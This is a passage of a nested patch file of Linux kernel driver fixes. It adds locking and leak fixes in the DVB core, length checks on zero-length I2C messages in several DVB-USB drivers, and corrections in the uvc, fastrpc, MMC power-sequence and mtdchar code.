+ 	struct dvb_net *dvbnet = dvbdev->priv;
+ 
++	mutex_lock(&dvbnet->remove_mutex);
++
+ 	dvb_generic_release(inode, file);
+ 
+-	if(dvbdev->users == 1 && dvbnet->exit == 1)
++	if (dvbdev->users == 1 && dvbnet->exit == 1) {
++		mutex_unlock(&dvbnet->remove_mutex);
+ 		wake_up(&dvbdev->wait_queue);
++	} else {
++		mutex_unlock(&dvbnet->remove_mutex);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -1580,7 +1608,7 @@ static int dvb_net_close(struct inode *inode, struct file *file)
+ static const struct file_operations dvb_net_fops = {
+ 	.owner = THIS_MODULE,
+ 	.unlocked_ioctl = dvb_net_ioctl,
+-	.open =	dvb_generic_open,
++	.open =	locked_dvb_net_open,
+ 	.release = dvb_net_close,
+ 	.llseek = noop_llseek,
+ };
+@@ -1599,10 +1627,13 @@ void dvb_net_release (struct dvb_net *dvbnet)
+ {
+ 	int i;
+ 
++	mutex_lock(&dvbnet->remove_mutex);
+ 	dvbnet->exit = 1;
++	mutex_unlock(&dvbnet->remove_mutex);
++
+ 	if (dvbnet->dvbdev->users < 1)
+ 		wait_event(dvbnet->dvbdev->wait_queue,
+-				dvbnet->dvbdev->users==1);
++				dvbnet->dvbdev->users == 1);
+ 
+ 	dvb_unregister_device(dvbnet->dvbdev);
+ 
+@@ -1621,6 +1652,7 @@ int dvb_net_init (struct dvb_adapter *adap, struct dvb_net *dvbnet,
+ 	int i;
+ 
+ 	mutex_init(&dvbnet->ioctl_mutex);
++	mutex_init(&dvbnet->remove_mutex);
+ 	dvbnet->demux = dmx;
+ 
+ 	for (i=0; i<DVB_NET_DEVICES_MAX; i++)
+diff --git a/drivers/media/dvb-core/dvbdev.c b/drivers/media/dvb-core/dvbdev.c
+index a31d52cb6d62c..9f9a976527080 100644
+--- a/drivers/media/dvb-core/dvbdev.c
++++ b/drivers/media/dvb-core/dvbdev.c
+@@ -27,6 +27,7 @@
+ #include <media/tuner.h>
+ 
+ static DEFINE_MUTEX(dvbdev_mutex);
++static LIST_HEAD(dvbdevfops_list);
+ static int dvbdev_debug;
+ 
+ module_param(dvbdev_debug, int, 0644);
+@@ -452,14 +453,15 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 			enum dvb_device_type type, int demux_sink_pads)
+ {
+ 	struct dvb_device *dvbdev;
+-	struct file_operations *dvbdevfops;
++	struct file_operations *dvbdevfops = NULL;
++	struct dvbdevfops_node *node = NULL, *new_node = NULL;
+ 	struct device *clsdev;
+ 	int minor;
+ 	int id, ret;
+ 
+ 	mutex_lock(&dvbdev_register_lock);
+ 
+-	if ((id = dvbdev_get_free_id (adap, type)) < 0){
++	if ((id = dvbdev_get_free_id (adap, type)) < 0) {
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		*pdvbdev = NULL;
+ 		pr_err("%s: couldn't find free device id\n", __func__);
+@@ -467,18 +469,45 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 	}
+ 
+ 	*pdvbdev = dvbdev = kzalloc(sizeof(*dvbdev), GFP_KERNEL);
+-
+ 	if (!dvbdev){
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return -ENOMEM;
+ 	}
+ 
+-	dvbdevfops = kmemdup(template->fops, sizeof(*dvbdevfops), GFP_KERNEL);
++	/*
++	 * When a device of the same type is probe()d more than once,
++	 * the first allocated fops are used. This prevents memory leaks
++	 * that can occur when the same device is probe()d repeatedly.
++	 */
++	list_for_each_entry(node, &dvbdevfops_list, list_head) {
++		if (node->fops->owner == adap->module &&
++				node->type == type &&
++				node->template == template) {
++			dvbdevfops = node->fops;
++			break;
++		}
++	}
+ 
+-	if (!dvbdevfops){
+-		kfree (dvbdev);
+-		mutex_unlock(&dvbdev_register_lock);
+-		return -ENOMEM;
++	if (dvbdevfops == NULL) {
++		dvbdevfops = kmemdup(template->fops, sizeof(*dvbdevfops), GFP_KERNEL);
++		if (!dvbdevfops) {
++			kfree(dvbdev);
++			mutex_unlock(&dvbdev_register_lock);
++			return -ENOMEM;
++		}
++
++		new_node = kzalloc(sizeof(struct dvbdevfops_node), GFP_KERNEL);
++		if (!new_node) {
++			kfree(dvbdevfops);
++			kfree(dvbdev);
++			mutex_unlock(&dvbdev_register_lock);
++			return -ENOMEM;
++		}
++
++		new_node->fops = dvbdevfops;
++		new_node->type = type;
++		new_node->template = template;
++		list_add_tail (&new_node->list_head, &dvbdevfops_list);
+ 	}
+ 
+ 	memcpy(dvbdev, template, sizeof(struct dvb_device));
+@@ -489,20 +518,20 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ 	dvbdev->priv = priv;
+ 	dvbdev->fops = dvbdevfops;
+ 	init_waitqueue_head (&dvbdev->wait_queue);
+-
+ 	dvbdevfops->owner = adap->module;
+-
+ 	list_add_tail (&dvbdev->list_head, &adap->device_list);
+-
+ 	down_write(&minor_rwsem);
+ #ifdef CONFIG_DVB_DYNAMIC_MINORS
+ 	for (minor = 0; minor < MAX_DVB_MINORS; minor++)
+ 		if (dvb_minors[minor] == NULL)
+ 			break;
+-
+ 	if (minor == MAX_DVB_MINORS) {
++		if (new_node) {
++			list_del (&new_node->list_head);
++			kfree(dvbdevfops);
++			kfree(new_node);
++		}
+ 		list_del (&dvbdev->list_head);
+-		kfree(dvbdevfops);
+ 		kfree(dvbdev);
+ 		up_write(&minor_rwsem);
+ 		mutex_unlock(&dvbdev_register_lock);
+@@ -511,41 +540,47 @@ int dvb_register_device(struct dvb_adapter *adap, struct dvb_device **pdvbdev,
+ #else
+ 	minor = nums2minor(adap->num, type, id);
+ #endif
+-
+ 	dvbdev->minor = minor;
+ 	dvb_minors[minor] = dvb_device_get(dvbdev);
+ 	up_write(&minor_rwsem);
+-
+ 	ret = dvb_register_media_device(dvbdev, type, minor, demux_sink_pads);
+ 	if (ret) {
+ 		pr_err("%s: dvb_register_media_device failed to create the mediagraph\n",
+ 		      __func__);
+-
++		if (new_node) {
++			list_del (&new_node->list_head);
++			kfree(dvbdevfops);
++			kfree(new_node);
++		}
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+-		kfree(dvbdevfops);
+ 		kfree(dvbdev);
+ 		mutex_unlock(&dvbdev_register_lock);
+ 		return ret;
+ 	}
+ 
+-	mutex_unlock(&dvbdev_register_lock);
+-
+ 	clsdev = device_create(dvb_class, adap->device,
+ 			       MKDEV(DVB_MAJOR, minor),
+ 			       dvbdev, "dvb%d.%s%d", adap->num, dnames[type], id);
+ 	if (IS_ERR(clsdev)) {
+ 		pr_err("%s: failed to create device dvb%d.%s%d (%ld)\n",
+ 		       __func__, adap->num, dnames[type], id, PTR_ERR(clsdev));
++		if (new_node) {
++			list_del (&new_node->list_head);
++			kfree(dvbdevfops);
++			kfree(new_node);
++		}
+ 		dvb_media_device_free(dvbdev);
+ 		list_del (&dvbdev->list_head);
+-		kfree(dvbdevfops);
+ 		kfree(dvbdev);
++		mutex_unlock(&dvbdev_register_lock);
+ 		return PTR_ERR(clsdev);
+ 	}
++
+ 	dprintk("DVB: register adapter%d/%s%d @ minor: %i (0x%02x)\n",
+ 		adap->num, dnames[type], id, minor, minor);
+ 
++	mutex_unlock(&dvbdev_register_lock);
+ 	return 0;
+ }
+ EXPORT_SYMBOL(dvb_register_device);
+@@ -574,7 +609,6 @@ static void dvb_free_device(struct kref *ref)
+ {
+ 	struct dvb_device *dvbdev = container_of(ref, struct dvb_device, ref);
+ 
+-	kfree (dvbdev->fops);
+ 	kfree (dvbdev);
+ }
+ 
+@@ -1080,9 +1114,17 @@ error:
+ 
+ static void __exit exit_dvbdev(void)
+ {
++	struct dvbdevfops_node *node, *next;
++
+ 	class_destroy(dvb_class);
+ 	cdev_del(&dvb_device_cdev);
+ 	unregister_chrdev_region(MKDEV(DVB_MAJOR, 0), MAX_DVB_MINORS);
++
++	list_for_each_entry_safe(node, next, &dvbdevfops_list, list_head) {
++		list_del (&node->list_head);
++		kfree(node->fops);
++		kfree(node);
++	}
+ }
+ 
+ subsys_initcall(init_dvbdev);
+diff --git a/drivers/media/dvb-frontends/mn88443x.c b/drivers/media/dvb-frontends/mn88443x.c
+index 452571b380b72..5a024870979de 100644
+--- a/drivers/media/dvb-frontends/mn88443x.c
++++ b/drivers/media/dvb-frontends/mn88443x.c
+@@ -798,7 +798,7 @@ MODULE_DEVICE_TABLE(i2c, mn88443x_i2c_id);
+ static struct i2c_driver mn88443x_driver = {
+ 	.driver = {
+ 		.name = "mn88443x",
+-		.of_match_table = of_match_ptr(mn88443x_of_match),
++		.of_match_table = mn88443x_of_match,
+ 	},
+ 	.probe    = mn88443x_probe,
+ 	.remove   = mn88443x_remove,
+diff --git a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+index aaa1d2dedebdd..d85bfbb77a250 100644
+--- a/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
++++ b/drivers/media/pci/netup_unidvb/netup_unidvb_core.c
+@@ -887,12 +887,7 @@ static int netup_unidvb_initdev(struct pci_dev *pci_dev,
+ 		ndev->lmmio0, (u32)pci_resource_len(pci_dev, 0),
+ 		ndev->lmmio1, (u32)pci_resource_len(pci_dev, 1),
+ 		pci_dev->irq);
+-	if (request_irq(pci_dev->irq, netup_unidvb_isr, IRQF_SHARED,
+-			"netup_unidvb", pci_dev) < 0) {
+-		dev_err(&pci_dev->dev,
+-			"%s(): can't get IRQ %d\n", __func__, pci_dev->irq);
+-		goto irq_request_err;
+-	}
++
+ 	ndev->dma_size = 2 * 188 *
+ 		NETUP_DMA_BLOCKS_COUNT * NETUP_DMA_PACKETS_COUNT;
+ 	ndev->dma_virt = dma_alloc_coherent(&pci_dev->dev,
+@@ -933,6 +928,14 @@ static int netup_unidvb_initdev(struct pci_dev *pci_dev,
+ 		dev_err(&pci_dev->dev, "netup_unidvb: DMA setup failed\n");
+ 		goto dma_setup_err;
+ 	}
++
++	if (request_irq(pci_dev->irq, netup_unidvb_isr, IRQF_SHARED,
++			"netup_unidvb", pci_dev) < 0) {
++		dev_err(&pci_dev->dev,
++			"%s(): can't get IRQ %d\n", __func__, pci_dev->irq);
++		goto dma_setup_err;
++	}
++
+ 	dev_info(&pci_dev->dev,
+ 		"netup_unidvb: device has been initialized\n");
+ 	return 0;
+@@ -951,8 +954,6 @@ spi_setup_err:
+ 	dma_free_coherent(&pci_dev->dev, ndev->dma_size,
+ 			ndev->dma_virt, ndev->dma_phys);
+ dma_alloc_err:
+-	free_irq(pci_dev->irq, pci_dev);
+-irq_request_err:
+ 	iounmap(ndev->lmmio1);
+ pci_bar1_error:
+ 	iounmap(ndev->lmmio0);
+diff --git a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+index 29991551cf614..0fbd030026c72 100644
+--- a/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
++++ b/drivers/media/platform/mediatek/vcodec/mtk_vcodec_dec_stateful.c
+@@ -584,6 +584,9 @@ static void mtk_init_vdec_params(struct mtk_vcodec_ctx *ctx)
+ 
+ 	if (!(ctx->dev->dec_capability & VCODEC_CAPABILITY_4K_DISABLED)) {
+ 		for (i = 0; i < num_supported_formats; i++) {
++			if (mtk_video_formats[i].type != MTK_FMT_DEC)
++				continue;
++
+ 			mtk_video_formats[i].frmsize.max_width =
+ 				VCODEC_DEC_4K_CODED_WIDTH;
+ 			mtk_video_formats[i].frmsize.max_height =
+diff --git a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+index 3aea96d85165a..ef5adffae1972 100644
+--- a/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
++++ b/drivers/media/platform/renesas/rcar-vin/rcar-dma.c
+@@ -651,11 +651,9 @@ static int rvin_setup(struct rvin_dev *vin)
+ 	case V4L2_FIELD_SEQ_TB:
+ 	case V4L2_FIELD_SEQ_BT:
+ 	case V4L2_FIELD_NONE:
+-		vnmc = VNMC_IM_ODD_EVEN;
+-		progressive = true;
+-		break;
+ 	case V4L2_FIELD_ALTERNATE:
+ 		vnmc = VNMC_IM_ODD_EVEN;
++		progressive = true;
+ 		break;
+ 	default:
+ 		vnmc = VNMC_IM_ODD;
+diff --git a/drivers/media/usb/dvb-usb-v2/ce6230.c b/drivers/media/usb/dvb-usb-v2/ce6230.c
+index 44540de1a2066..d3b5cb4a24daf 100644
+--- a/drivers/media/usb/dvb-usb-v2/ce6230.c
++++ b/drivers/media/usb/dvb-usb-v2/ce6230.c
+@@ -101,6 +101,10 @@ static int ce6230_i2c_master_xfer(struct i2c_adapter *adap,
+ 		if (num > i + 1 && (msg[i+1].flags & I2C_M_RD)) {
+ 			if (msg[i].addr ==
+ 				ce6230_zl10353_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = DEMOD_READ;
+ 				req.value = msg[i].addr >> 1;
+ 				req.index = msg[i].buf[0];
+@@ -117,6 +121,10 @@ static int ce6230_i2c_master_xfer(struct i2c_adapter *adap,
+ 		} else {
+ 			if (msg[i].addr ==
+ 				ce6230_zl10353_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = DEMOD_WRITE;
+ 				req.value = msg[i].addr >> 1;
+ 				req.index = msg[i].buf[0];
+diff --git a/drivers/media/usb/dvb-usb-v2/ec168.c b/drivers/media/usb/dvb-usb-v2/ec168.c
+index 7ed0ab9e429b1..0e4773fc025c9 100644
+--- a/drivers/media/usb/dvb-usb-v2/ec168.c
++++ b/drivers/media/usb/dvb-usb-v2/ec168.c
+@@ -115,6 +115,10 @@ static int ec168_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 	while (i < num) {
+ 		if (num > i + 1 && (msg[i+1].flags & I2C_M_RD)) {
+ 			if (msg[i].addr == ec168_ec100_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = READ_DEMOD;
+ 				req.value = 0;
+ 				req.index = 0xff00 + msg[i].buf[0]; /* reg */
+@@ -131,6 +135,10 @@ static int ec168_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			}
+ 		} else {
+ 			if (msg[i].addr == ec168_ec100_config.demod_address) {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = WRITE_DEMOD;
+ 				req.value = msg[i].buf[1]; /* val */
+ 				req.index = 0xff00 + msg[i].buf[0]; /* reg */
+@@ -139,6 +147,10 @@ static int ec168_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				ret = ec168_ctrl_msg(d, &req);
+ 				i += 1;
+ 			} else {
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				req.cmd = WRITE_I2C;
+ 				req.value = msg[i].buf[0]; /* val */
+ 				req.index = 0x0100 + msg[i].addr; /* I2C addr */
+diff --git a/drivers/media/usb/dvb-usb-v2/rtl28xxu.c b/drivers/media/usb/dvb-usb-v2/rtl28xxu.c
+index 795a012d40200..f7884bb56fccf 100644
+--- a/drivers/media/usb/dvb-usb-v2/rtl28xxu.c
++++ b/drivers/media/usb/dvb-usb-v2/rtl28xxu.c
+@@ -176,6 +176,10 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			ret = -EOPNOTSUPP;
+ 			goto err_mutex_unlock;
+ 		} else if (msg[0].addr == 0x10) {
++			if (msg[0].len < 1 || msg[1].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 1 - integrated demod */
+ 			if (msg[0].buf[0] == 0x00) {
+ 				/* return demod page from driver cache */
+@@ -189,6 +193,10 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				ret = rtl28xxu_ctrl_msg(d, &req);
+ 			}
+ 		} else if (msg[0].len < 2) {
++			if (msg[0].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 2 - old I2C */
+ 			req.value = (msg[0].buf[0] << 8) | (msg[0].addr << 1);
+ 			req.index = CMD_I2C_RD;
+@@ -217,8 +225,16 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 			ret = -EOPNOTSUPP;
+ 			goto err_mutex_unlock;
+ 		} else if (msg[0].addr == 0x10) {
++			if (msg[0].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 1 - integrated demod */
+ 			if (msg[0].buf[0] == 0x00) {
++				if (msg[0].len < 2) {
++					ret = -EOPNOTSUPP;
++					goto err_mutex_unlock;
++				}
+ 				/* save demod page for later demod access */
+ 				dev->page = msg[0].buf[1];
+ 				ret = 0;
+@@ -231,6 +247,10 @@ static int rtl28xxu_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[],
+ 				ret = rtl28xxu_ctrl_msg(d, &req);
+ 			}
+ 		} else if ((msg[0].len < 23) && (!dev->new_i2c_write)) {
++			if (msg[0].len < 1) {
++				ret = -EOPNOTSUPP;
++				goto err_mutex_unlock;
++			}
+ 			/* method 2 - old I2C */
+ 			req.value = (msg[0].buf[0] << 8) | (msg[0].addr << 1);
+ 			req.index = CMD_I2C_WR;
+diff --git a/drivers/media/usb/dvb-usb/az6027.c b/drivers/media/usb/dvb-usb/az6027.c
+index 7d78ee09be5e1..a31c6f82f4e90 100644
+--- a/drivers/media/usb/dvb-usb/az6027.c
++++ b/drivers/media/usb/dvb-usb/az6027.c
+@@ -988,6 +988,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 			/* write/read request */
+ 			if (i + 1 < num && (msg[i + 1].flags & I2C_M_RD)) {
+ 				req = 0xB9;
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				index = (((msg[i].buf[0] << 8) & 0xff00) | (msg[i].buf[1] & 0x00ff));
+ 				value = msg[i].addr + (msg[i].len << 8);
+ 				length = msg[i + 1].len + 6;
+@@ -1001,6 +1005,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 
+ 				/* demod 16bit addr */
+ 				req = 0xBD;
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				index = (((msg[i].buf[0] << 8) & 0xff00) | (msg[i].buf[1] & 0x00ff));
+ 				value = msg[i].addr + (2 << 8);
+ 				length = msg[i].len - 2;
+@@ -1026,6 +1034,10 @@ static int az6027_i2c_xfer(struct i2c_adapter *adap, struct i2c_msg msg[], int n
+ 			} else {
+ 
+ 				req = 0xBD;
++				if (msg[i].len < 1) {
++					i = -EOPNOTSUPP;
++					break;
++				}
+ 				index = msg[i].buf[0] & 0x00FF;
+ 				value = msg[i].addr + (1 << 8);
+ 				length = msg[i].len - 1;
+diff --git a/drivers/media/usb/dvb-usb/digitv.c b/drivers/media/usb/dvb-usb/digitv.c
+index 2756815a780bc..32134be169148 100644
+--- a/drivers/media/usb/dvb-usb/digitv.c
++++ b/drivers/media/usb/dvb-usb/digitv.c
+@@ -63,6 +63,10 @@ static int digitv_i2c_xfer(struct i2c_adapter *adap,struct i2c_msg msg[],int num
+ 		warn("more than 2 i2c messages at a time is not handled yet. TODO.");
+ 
+ 	for (i = 0; i < num; i++) {
++		if (msg[i].len < 1) {
++			i = -EOPNOTSUPP;
++			break;
++		}
+ 		/* write/read request */
+ 		if (i+1 < num && (msg[i+1].flags & I2C_M_RD)) {
+ 			if (digitv_ctrl_msg(d, USB_READ_COFDM, msg[i].buf[0], NULL, 0,
+diff --git a/drivers/media/usb/dvb-usb/dw2102.c b/drivers/media/usb/dvb-usb/dw2102.c
+index 0ca764282c767..8747960e61461 100644
+--- a/drivers/media/usb/dvb-usb/dw2102.c
++++ b/drivers/media/usb/dvb-usb/dw2102.c
+@@ -946,7 +946,7 @@ static int su3000_read_mac_address(struct dvb_usb_device *d, u8 mac[6])
+ 	for (i = 0; i < 6; i++) {
+ 		obuf[1] = 0xf0 + i;
+ 		if (i2c_transfer(&d->i2c_adap, msg, 2) != 2)
+-			break;
++			return -1;
+ 		else
+ 			mac[i] = ibuf[0];
+ 	}
+diff --git a/drivers/media/usb/ttusb-dec/ttusb_dec.c b/drivers/media/usb/ttusb-dec/ttusb_dec.c
+index 38822cedd93a9..c4474d4c44e28 100644
+--- a/drivers/media/usb/ttusb-dec/ttusb_dec.c
++++ b/drivers/media/usb/ttusb-dec/ttusb_dec.c
+@@ -1544,8 +1544,7 @@ static void ttusb_dec_exit_dvb(struct ttusb_dec *dec)
+ 	dvb_dmx_release(&dec->demux);
+ 	if (dec->fe) {
+ 		dvb_unregister_frontend(dec->fe);
+-		if (dec->fe->ops.release)
+-			dec->fe->ops.release(dec->fe);
++		dvb_frontend_detach(dec->fe);
+ 	}
+ 	dvb_unregister_adapter(&dec->adapter);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index a9cdef07e6b14..191db831d7606 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -251,14 +251,17 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		/* Find the format descriptor from its GUID. */
+ 		fmtdesc = uvc_format_by_guid(&buffer[5]);
+ 
+-		if (fmtdesc != NULL) {
+-			format->fcc = fmtdesc->fcc;
+-		} else {
++		if (!fmtdesc) {
++			/*
++			 * Unknown video formats are not fatal errors, the
++			 * caller will skip this descriptor.
++			 */
+ 			dev_info(&streaming->intf->dev,
+ 				 "Unknown video format %pUl\n", &buffer[5]);
+-			format->fcc = 0;
++			return 0;
+ 		}
+ 
++		format->fcc = fmtdesc->fcc;
+ 		format->bpp = buffer[21];
+ 
+ 		/*
+@@ -675,7 +678,7 @@ static int uvc_parse_streaming(struct uvc_device *dev,
+ 	interval = (u32 *)&frame[nframes];
+ 
+ 	streaming->format = format;
+-	streaming->nformats = nformats;
++	streaming->nformats = 0;
+ 
+ 	/* Parse the format descriptors. */
+ 	while (buflen > 2 && buffer[1] == USB_DT_CS_INTERFACE) {
+@@ -689,7 +692,10 @@ static int uvc_parse_streaming(struct uvc_device *dev,
+ 				&interval, buffer, buflen);
+ 			if (ret < 0)
+ 				goto error;
++			if (!ret)
++				break;
+ 
++			streaming->nformats++;
+ 			frame += format->nframes;
+ 			format++;
+ 
+diff --git a/drivers/misc/fastrpc.c b/drivers/misc/fastrpc.c
+index 02d26160c64e6..8b1e8661c3d73 100644
+--- a/drivers/misc/fastrpc.c
++++ b/drivers/misc/fastrpc.c
+@@ -2149,8 +2149,10 @@ static void fastrpc_notify_users(struct fastrpc_user *user)
+ 	struct fastrpc_invoke_ctx *ctx;
+ 
+ 	spin_lock(&user->lock);
+-	list_for_each_entry(ctx, &user->pending, node)
++	list_for_each_entry(ctx, &user->pending, node) {
++		ctx->retval = -EPIPE;
+ 		complete(&ctx->work);
++	}
+ 	spin_unlock(&user->lock);
+ }
+ 
+@@ -2160,7 +2162,9 @@ static void fastrpc_rpmsg_remove(struct rpmsg_device *rpdev)
+ 	struct fastrpc_user *user;
+ 	unsigned long flags;
+ 
++	/* No invocations past this point */
+ 	spin_lock_irqsave(&cctx->lock, flags);
++	cctx->rpdev = NULL;
+ 	list_for_each_entry(user, &cctx->users, user)
+ 		fastrpc_notify_users(user);
+ 	spin_unlock_irqrestore(&cctx->lock, flags);
+@@ -2173,7 +2177,6 @@ static void fastrpc_rpmsg_remove(struct rpmsg_device *rpdev)
+ 
+ 	of_platform_depopulate(&rpdev->dev);
+ 
+-	cctx->rpdev = NULL;
+ 	fastrpc_channel_ctx_put(cctx);
+ }
+ 
+diff --git a/drivers/mmc/core/pwrseq_sd8787.c b/drivers/mmc/core/pwrseq_sd8787.c
+index 2e120ad83020f..0c5f5e371e1f8 100644
+--- a/drivers/mmc/core/pwrseq_sd8787.c
++++ b/drivers/mmc/core/pwrseq_sd8787.c
+@@ -28,7 +28,6 @@ struct mmc_pwrseq_sd8787 {
+ 	struct mmc_pwrseq pwrseq;
+ 	struct gpio_desc *reset_gpio;
+ 	struct gpio_desc *pwrdn_gpio;
+-	u32 reset_pwrdwn_delay_ms;
+ };
+ 
+ #define to_pwrseq_sd8787(p) container_of(p, struct mmc_pwrseq_sd8787, pwrseq)
+@@ -39,7 +38,7 @@ static void mmc_pwrseq_sd8787_pre_power_on(struct mmc_host *host)
+ 
+ 	gpiod_set_value_cansleep(pwrseq->reset_gpio, 1);
+ 
+-	msleep(pwrseq->reset_pwrdwn_delay_ms);
++	msleep(300);
+ 	gpiod_set_value_cansleep(pwrseq->pwrdn_gpio, 1);
+ }
+ 
+@@ -51,17 +50,37 @@ static void mmc_pwrseq_sd8787_power_off(struct mmc_host *host)
+ 	gpiod_set_value_cansleep(pwrseq->reset_gpio, 0);
+ }
+ 
++static void mmc_pwrseq_wilc1000_pre_power_on(struct mmc_host *host)
++{
++	struct mmc_pwrseq_sd8787 *pwrseq = to_pwrseq_sd8787(host->pwrseq);
++
++	/* The pwrdn_gpio is really CHIP_EN, reset_gpio is RESETN */
++	gpiod_set_value_cansleep(pwrseq->pwrdn_gpio, 1);
++	msleep(5);
++	gpiod_set_value_cansleep(pwrseq->reset_gpio, 1);
++}
++
++static void mmc_pwrseq_wilc1000_power_off(struct mmc_host *host)
++{
++	struct mmc_pwrseq_sd8787 *pwrseq = to_pwrseq_sd8787(host->pwrseq);
++
++	gpiod_set_value_cansleep(pwrseq->reset_gpio, 0);
++	gpiod_set_value_cansleep(pwrseq->pwrdn_gpio, 0);
++}
++
+ static const struct mmc_pwrseq_ops mmc_pwrseq_sd8787_ops = {
+ 	.pre_power_on = mmc_pwrseq_sd8787_pre_power_on,
+ 	.power_off = mmc_pwrseq_sd8787_power_off,
+ };
+ 
+-static const u32 sd8787_delay_ms = 300;
+-static const u32 wilc1000_delay_ms = 5;
++static const struct mmc_pwrseq_ops mmc_pwrseq_wilc1000_ops = {
++	.pre_power_on = mmc_pwrseq_wilc1000_pre_power_on,
++	.power_off = mmc_pwrseq_wilc1000_power_off,
++};
+ 
+ static const struct of_device_id mmc_pwrseq_sd8787_of_match[] = {
+-	{ .compatible = "mmc-pwrseq-sd8787", .data = &sd8787_delay_ms },
+-	{ .compatible = "mmc-pwrseq-wilc1000", .data = &wilc1000_delay_ms },
++	{ .compatible = "mmc-pwrseq-sd8787", .data = &mmc_pwrseq_sd8787_ops },
++	{ .compatible = "mmc-pwrseq-wilc1000", .data = &mmc_pwrseq_wilc1000_ops },
+ 	{/* sentinel */},
+ };
+ MODULE_DEVICE_TABLE(of, mmc_pwrseq_sd8787_of_match);
+@@ -77,7 +96,6 @@ static int mmc_pwrseq_sd8787_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	match = of_match_node(mmc_pwrseq_sd8787_of_match, pdev->dev.of_node);
+-	pwrseq->reset_pwrdwn_delay_ms = *(u32 *)match->data;
+ 
+ 	pwrseq->pwrdn_gpio = devm_gpiod_get(dev, "powerdown", GPIOD_OUT_LOW);
+ 	if (IS_ERR(pwrseq->pwrdn_gpio))
+@@ -88,7 +106,7 @@ static int mmc_pwrseq_sd8787_probe(struct platform_device *pdev)
+ 		return PTR_ERR(pwrseq->reset_gpio);
+ 
+ 	pwrseq->pwrseq.dev = dev;
+-	pwrseq->pwrseq.ops = &mmc_pwrseq_sd8787_ops;
++	pwrseq->pwrseq.ops = match->data;
+ 	pwrseq->pwrseq.owner = THIS_MODULE;
+ 	platform_set_drvdata(pdev, pwrseq);
+ 
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index 72f65f32abbc7..7dc0e91dabfc7 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -1715,6 +1715,9 @@ static void construct_request_response(struct vub300_mmc_host *vub300,
+ 	int bytes = 3 & less_cmd;
+ 	int words = less_cmd >> 2;
+ 	u8 *r = vub300->resp.response.command_response;
++
++	if (!resp_len)
++		return;
+ 	if (bytes == 3) {
+ 		cmd->resp[words] = (r[1 + (words << 2)] << 24)
+ 			| (r[2 + (words << 2)] << 16)
+diff --git a/drivers/mtd/mtdchar.c b/drivers/mtd/mtdchar.c
+index 01f1c6792df9c..8dc4f5c493fcb 100644
+--- a/drivers/mtd/mtdchar.c
++++ b/drivers/mtd/mtdchar.c
+@@ -590,8 +590,8 @@ static void adjust_oob_length(struct mtd_info *mtd, uint64_t start,
+ 			    (end_page - start_page + 1) * oob_per_page);
+ }
+ 
+-static int mtdchar_write_ioctl(struct mtd_info *mtd,
+-		struct mtd_write_req __user *argp)
++static noinline_for_stack int
++mtdchar_write_ioctl(struct mtd_info *mtd, struct mtd_write_req __user *argp)
+ {
+ 	struct mtd_info *master = mtd_get_master(mtd);
+ 	struct mtd_write_req req;
+@@ -688,8 +688,8 @@ static int mtdchar_write_ioctl(struct mtd_info *mtd,
+ 	return ret;
+ }
+ 
+-static int mtdchar_read_ioctl(struct mtd_info *mtd,
+-		struct mtd_read_req __user *argp)
++static noinline_for_stack int
++mtdchar_read_ioctl(struct mtd_info *mtd, struct mtd_read_req __user *argp)
+ {
+ 	struct mtd_info *master = mtd_get_master(mtd);
+ 	struct mtd_read_req req;
